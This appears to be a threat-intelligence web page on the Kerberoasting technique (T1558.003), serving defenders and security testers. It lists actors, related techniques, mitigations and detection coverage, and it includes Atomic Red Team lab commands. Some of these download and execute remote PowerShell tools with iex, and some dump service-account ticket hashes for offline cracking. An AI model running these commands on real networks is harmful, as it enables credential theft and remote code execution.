Home/ATT&CK Technique/Kerberoasting
ATT&CK Technique

Kerberoasting

T1558.003 · credential-access

Adversaries may abuse a valid Kerberos ticket-granting ticket (TGT) or sniff network traffic to obtain a ticket-granting service (TGS) ticket that may be vulnerable to Brute Force. Service principal names (SPNs) are used to uniquely identify each instance of a Windows service. To enable authentication, Kerberos requires that SPNs be associated with at least one service logon account (an account specifically tasked with running a service).

Adversaries possessing a valid Kerberos ticket-granting ticket (TGT) may request one or more Kerberos ticket-granting service (TGS) service tickets for any SPN from a domain controller (DC). Portions of these tickets may be encrypted with the RC4 algorithm, meaning the Kerberos 5 TGS-REP etype 23 hash of the service account associated with the SPN is used as the private key and is thus vulnerable to offline Brute Force attacks that may expose plaintext credentials. This same behavior could be executed using service tickets captured from network traffic.

Cracked hashes may enable Persistence, Privilege Escalation, and Lateral Movement via access to Valid Accounts.

Windows

Actors Using This

3
russiaAPT29
malaysia_origin_with_international_affiliatesDragonForce
russiaSandworm Team

Likely Attack Path

Techniques the same actors pair with this one distinctively - those showing up among actors who use this technique noticeably more than across all actors (lift > 1.15), grouped by kill-chain phase. The × is that lift multiplier; the shared-actor count is in the tooltip. A near-universal technique pairs with everything at baseline, so its list is short by design.
initial-access earlier
T1195 · Supply Chain Compromise ×5.80T1199 · Trusted Relationship ×2.74
execution earlier
T1047 · Windows Management Instrumentation ×4.25
persistence earlier
T1505.003 · Web Shell ×2.83
credential-access same
T1558 · Steal or Forge Kerberos Tickets ×59.50
lateral-movement later
T1021.006 · Windows Remote Management ×4.86T1550 · Use Alternate Authentication Material ×4.58T1021.002 · SMB/Windows Admin Shares ×1.95T1021.001 · Remote Desktop Protocol ×1.87T1021 · Remote Services ×1.56
collection later
T1560.001 · Archive via Utility ×2.83T1560 · Archive Collected Data ×2.12T1074 · Data Staged ×1.52
command-and-control later
T1090.003 · Multi-hop Proxy ×4.03
exfiltration later
T1048 · Exfiltration Over Alternative Protocol ×2.48

Atomic Tests

7
Executable Atomic Red Team test cases for exercising this technique in a lab. Copy a command, run it on the listed platform, confirm your detections fire.
powershellwindowsRequest for service tickets
This test uses the Powershell Empire Module: Invoke-Kerberoast.ps1 The following are further sources and credits for this attack: [Kerberoasting Without Mimikatz source] (https://www.harmj0y.net/blog/powershell/kerberoasting-without-mimikatz/) [Invoke-Kerberoast source] (https://powersploit.readthedocs.io/en/latest/Recon/Invoke-Kerberoast/) when executed successfully , the test displays available services with their hashes. If the testing domain doesn't have any service principal name configured, there is no output 
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
iex(iwr https://raw.githubusercontent.com/EmpireProject/Empire/08cbd274bef78243d7a8ed6443b8364acd1fc48b/data/module_source/credentials/Invoke-Kerberoast.ps1 -UseBasicParsing)
Invoke-Kerberoast | fl
powershellwindowsRubeus kerberoast
Information on the Rubeus tool and it's creators found here: https://github.com/GhostPack/Rubeus#asreproast This build targets .NET 4.5. If targeting a different version you will need to compile Rubeus 
klist purge
cmd.exe /c "#{local_folder}\#{local_executable}" kerberoast #{flags} /outfile:"#{local_folder}\#{out_file}"
command_promptwindowsExtract all accounts in use as SPN using setspn
The following test will utilize setspn to extract the Service Principal Names. This behavior is typically used during a kerberos or silver ticket attack. A successful execution will output all the SPNs for the related domain. 
setspn -T #{domain_name} -Q */*
powershellwindowsRequest A Single Ticket via PowerShell
The following test will utilize native PowerShell Identity modules to query the domain to extract the Service Principal Names for a single computer. This behavior is typically used during a kerberos or silver ticket attack. A successful execution will output the SPNs for the endpoint in question. 
Add-Type -AssemblyName System.IdentityModel
$ComputerFQDN=$env:LogonServer.trimStart('\') + "." + $env:UserDnsDomain
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "HTTP/$ComputerFQDN"
powershellwindowsRequest All Tickets via PowerShell
The following test will utilize native PowerShell Identity modules to query the domain to extract allthe Service Principal Names. This behavior is typically used during a kerberos or silver ticket attack. A successful execution will output the SPNs for the domain in question. 
Add-Type -AssemblyName System.IdentityModel  
setspn.exe -T #{domain_name} -Q */* | Select-String '^CN' -Context 0,1 | % { New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $_.Context.PostContext[0].Trim() }
powershellwindowsWinPwn - Kerberoasting
Kerberoasting technique via function of WinPwn
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Kerberoasting -consoleoutput -noninteractive
powershellwindowsWinPwn - PowerSharpPack - Kerberoasting Using Rubeus
PowerSharpPack - Kerberoasting Using Rubeus technique via function of WinPwn
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-Rubeus.ps1')
Invoke-Rubeus -Command "kerberoast /format:hashcat /nowrap"

Mitigations

3
MITRE ATT&CK mitigations - vendor-agnostic guidance for reducing exposure to this technique.
M1026Privileged Account Management

Privileged Account Management focuses on implementing policies, controls, and tools to securely manage privileged accounts (e.g., SYSTEM, root, or administrative accounts). This includes restricting access, limiting the scope of permissions, monitoring privileged account usage, and ensuring accountability through logging and auditing.

Account Permissions and Roles
  • Implement RBAC and least privilege principles to allocate permissions securely.
  • Use tools like Active Directory Group Policies to enforce access restrictions.
Credential Security
  • Deploy password vaulting tools like CyberArk, HashiCorp Vault, or KeePass for secure storage and rotation of credentials.
  • Enforce password policies for complexity, uniqueness, and expiration using tools like Microsoft Group Policy Objects (GPO).
Multi-Factor Authentication (MFA)
  • Enforce MFA for all privileged accounts using Duo Security, Okta, or Microsoft Azure AD MFA.
Privileged Access Management (PAM)
  • Use PAM solutions like CyberArk, BeyondTrust, or Thycotic to manage, monitor, and audit privileged access.
Auditing and Monitoring
  • Integrate activity monitoring into your SIEM (e.g., Splunk or QRadar) to detect and alert on anomalous privileged account usage.
Just-In-Time Access
  • Deploy JIT solutions like Azure Privileged Identity Management (PIM) or configure ephemeral roles in AWS and GCP to grant time-limited elevated permissions.
Tools for Implementation Privileged Access Management (PAM)
  • CyberArk, BeyondTrust, Thycotic, HashiCorp Vault.
Credential Management
  • Microsoft LAPS (Local Admin Password Solution), Password Safe, HashiCorp Vault, KeePass.
Multi-Factor Authentication
  • Duo Security, Okta, Microsoft Azure MFA, Google Authenticator.
Linux Privilege Management
  • sudo configuration, SELinux, AppArmor.
Just-In-Time Access
  • Azure Privileged Identity Management (PIM), AWS IAM Roles with session constraints, GCP Identity-Aware Proxy.
M1027Password Policies

Set and enforce secure password policies for accounts to reduce the likelihood of unauthorized access. Strong password policies include enforcing password complexity, requiring regular password changes, and preventing password reuse.

Windows Systems
Use Group Policy Management Console (GPMC) to configure
  • Minimum password length (e.g., 12+ characters).
  • Password complexity requirements.
  • Password history (e.g., disallow last 24 passwords).
  • Account lockout duration and thresholds.
Linux Systems
Configure Pluggable Authentication Modules (PAM)
  • Use pam_pwquality to enforce complexity and length requirements.
  • Implement pam_tally2 or pam_faillock for account lockouts.
  • Use pwunconv to disable password reuse.
Password Managers
  • Enforce usage of enterprise password managers (e.g., Bitwarden, 1Password, LastPass) to generate and store strong passwords.
Password Blacklisting
  • Use tools like Have I Been Pwned password checks or NIST-based blacklist solutions to prevent users from setting compromised passwords.
Regular Auditing
  • Periodically audit password policies and account configurations to ensure compliance using tools like LAPS (Local Admin Password Solution) and vulnerability scanners.
Tools for Implementation Windows
  • Group Policy Management Console (GPMC): Enforce password policies.
  • Microsoft Local Administrator Password Solution (LAPS): Enforce random, unique admin passwords.
Linux/macOS
  • PAM Modules (pam_pwquality, pam_tally2, pam_faillock): Enforce password rules.
  • Lynis: Audit password policies and system configurations.
Cross-Platform
  • Password Managers (Bitwarden, 1Password, KeePass): Manage and enforce strong passwords.
  • Have I Been Pwned API: Prevent the use of breached passwords.
  • NIST SP 800-63B compliant tools: Enforce password guidelines and blacklisting.
M1041Encrypt Sensitive Information

Protect sensitive information at rest, in transit, and during processing by using strong encryption algorithms. Encryption ensures the confidentiality and integrity of data, preventing unauthorized access or tampering.

Encrypt Data at Rest
  • Use Case: Use full-disk encryption or file-level encryption to secure sensitive data stored on devices.
  • Implementation: Implement BitLocker for Windows systems or FileVault for macOS devices to encrypt hard drives.
Encrypt Data in Transit
  • Use Case: Use secure communication protocols (e.g., TLS, HTTPS) to encrypt sensitive data as it travels over networks.
  • Implementation: Enable HTTPS for all web applications and configure mail servers to enforce STARTTLS for email encryption.
Encrypt Backups
  • Use Case: Ensure that backup data is encrypted both during storage and transfer to prevent unauthorized access.
  • Implementation: Encrypt cloud backups using AES-256 before uploading them to Amazon S3 or Google Cloud.
Encrypt Application Secrets
  • Use Case: Store sensitive credentials, API keys, and configuration files in encrypted vaults.
  • Implementation: Use HashiCorp Vault or AWS Secrets Manager to manage and encrypt secrets.
Database Encryption
  • Use Case: Enable Transparent Data Encryption (TDE) or column-level encryption in database management systems.
  • Implementation: Use MySQL’s built-in encryption features to encrypt sensitive database fields such as social security numbers.

Detection Coverage

1/6 layers
Coverage across standard detection surfaces. Rows marked none have no rule of that type mapped. Some are real blind spots worth closing; others are simply not applicable to this technique (e.g. YARA matches malware files, not network behaviour).
Behavioral / log (Sigma) 15
Analytics (MITRE CAR) none
Runtime / container (Falco) none
File / malware (YARA) none
Network (Suricata/Snort) none
Vuln scan (Nuclei) none

Comply & Defend

NIST 800-53AC-02, AC-03, AC-05, AC-06, AC-16, AC-17, AC-18, AC-19, CA-07, CM-02, CM-05, CM-06, IA-02, IA-05, SC-04, SI-03, SI-04, SI-07, SI-12
D3FEND10 defensive techniques
Intelligence Graph · click any node to traverse
CVETechnique ActorTool Family
drag to reposition · click any node to traverse · button top-right enlarges
External lookups - second-class, for what we don’t hold ourselves
MITRE ATT&CKAtomic Red Teamcar (MITRE)
Vulnerabilities
CISA KEV catalog
CWE weaknesses
CAPEC attack patterns
Package vulnerabilities
Threat intelligence
Threat actors
Tools & malware
ATT&CK techniques
IOCs
Detection & defense
Sigma rules
YARA rules
Atomic Red Team tests
D3FEND countermeasures
Compliance
NIST 800-53
ISO 27001:2022
SOC 2 TSC
PCI-DSS v4.0
CIS Controls v8.1
About
All capabilities
Live statistics
Data sources
Privacy policy
Terms of service
threatengine.sh  ·  Open-source threat intelligence platform  ·  100+ authoritative sources  ·  Every fact traces to its origin